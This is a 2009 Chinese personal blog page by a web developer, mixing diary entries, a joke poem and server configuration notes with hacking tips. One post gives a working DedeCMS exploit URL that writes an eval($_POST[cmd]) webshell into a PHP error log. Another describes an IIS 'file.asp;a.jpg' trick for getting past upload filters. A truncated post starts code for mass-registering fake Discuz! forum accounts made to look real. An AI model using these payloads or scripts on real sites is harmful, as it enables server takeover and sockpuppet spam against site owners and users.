gooD GoOd StuDy ANd day Day uP
百度空间 | 百度首页 
 
文章列表
 
2009-10-27 13:34

失误啊,webshell中的批量清马功能直接对asp等格式的文件用文本文件的方式打开访问了,但是没考虑到数据库也有可能改了后缀,导致数据库被直接破坏了,很严重,试过了软件和手工修复,均失败。灾难啊,以后绝不能发生这种情况了。

 
2009-10-21 22:36

2009-10-18~10-19两天,我经历了很多没有经历过的事情,第一次爬山,第一次出省,第一次肆无忌惮的和团队做拓展活动。选了几张照片放上来留作纪念。

 

 
2009-09-14 23:11

曾经连续多周上光荣榜的牛X宿舍,班主任和系领导也多次表扬~

 

 
2009-08-31 00:09

来源:寂寞hacker
http://hi.baidu.com/isbx/blog/item/2aac342a17bdc5315243c18c.html

用文件名1.asp;a.jpg测试了下,内容为:<%Response.Write("test")%>,还真能解析,但中间的格式只能为.asp;。在只限制后缀的某些情况下似乎又多了条思路~~

 
2009-08-29 14:13
坊间流传很久了,已经拿站拿的官方补丁都有了,终于有人公布了。

dede的数据库错误日志写文件的,之前是写在data/mysql_error_trace.php中,所以产生了漏洞,只要找个地方报个错,就能写shell了。

dede数据库能报错的地方很多,现在大家用的是plus/digg_frame.php文件。

漏洞exp:

1.访问网址:

http://www.dedecms.com/plus/digg_frame.php?action=good&id=1024e1024&mid=*/eval($_POST[cmd]);?>

2.shell在:http://www.dedecms.com/data/mysql_error_trace.php中。
 
2009-08-20 08:54

  一.Ubuntu下启动mysql方法:

  /etc/init.d/sudo mysqld

  二.用户添加

  bin>mysql -u root

  mysql> grant 权限1,权限2,...权限n on 数据库名称.表名称 to 用户名@用户地址 identified by '连接口令';

  权限1,权限2,...权限n代表select,insert,update,delete,create,drop,index,alter,grant,references,reload,shutdown,process,file等14个权限。

  当权限1,权限2,...权限n被all privileges或者all代替,表示赋予用户全部权限。

  当数据库名称.表

 
2009-08-19 13:48
五环外管庄人民的鼾声此起彼伏

哥还在古董笔记本前面徘徊

烟屁横飞 代码狂舞

哥是这个圈子里的元老

四里八村乡亲们的电脑都是我亲自维护

服务周到 还免费

刻录光盘 U盘 移动硬

应有尽有 贼便宜

其实他们不知道

哥的专业是做网站

哥今天的早餐是煎饼果子

加薄脆多来葱花面酱的那种

开封菜的发疯烧饼 哥是不屑吃的

性价比太低!!!

其实,像哥这种夜魅族是很少吃早餐的

按照地球那边的作息时间
 
2009-08-16 19:01

从小就这样,长大了还得了。父母都舍不得嫁了。

 

 
2009-08-06 11:19

  对于虚拟主机来说,空间是否支持 Rewrite 以及是否支持对站点目录中 .htaccess 的文件解析,只有满足这两条件,URL 静态化 功能才会生效。

Apache Web Server(虚拟主机用户)

在开始以下设置之前,请首先咨询您的空间服务商,空间是否支持 Rewrite 以及是否支持对站点目录中.htaccess 的文件解析,否则即便按照下面的方法设置好了,也无法使用。   检查论坛所在目录中是否存在 .htaccess 文件,如果不存在,请手工建立此文件。Win32 系统下,无法直接建立 .htaccess 文件,您可以从其他系统中拷贝

 
2009-06-12 23:42

  网上现成的代码存在不少问题,根本不能用,所以就改了下。在discuz! 6.1.0下测试成功,可以正常登录、发帖。

  此程序必须预先定义好所有的用户名,没有采用随机组合字符的方法。并且所有用户的注册日期都不一样,以提高真实性。

  定义用户的文件user.php:

<?php
$username = array(
'user1','netoom','qwer' //省略n多用户
);
?>

  主文件reg.php:

<?php
require_once './include/common.inc.php';
require_once 'user.php';
$member_nu

 
     
 
 
日历
 
     
 
个人档案
 
xcrypt

江苏 常州 
上次登录:
14天前
加为好友
 
   
 
最新照片
 
   
 
最近访客
 
 

闷绝王小明

小騩

youwant

duguxianzhi

miki_store

gx_seo

lx236819850

iGoodone
     
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2009 Baidu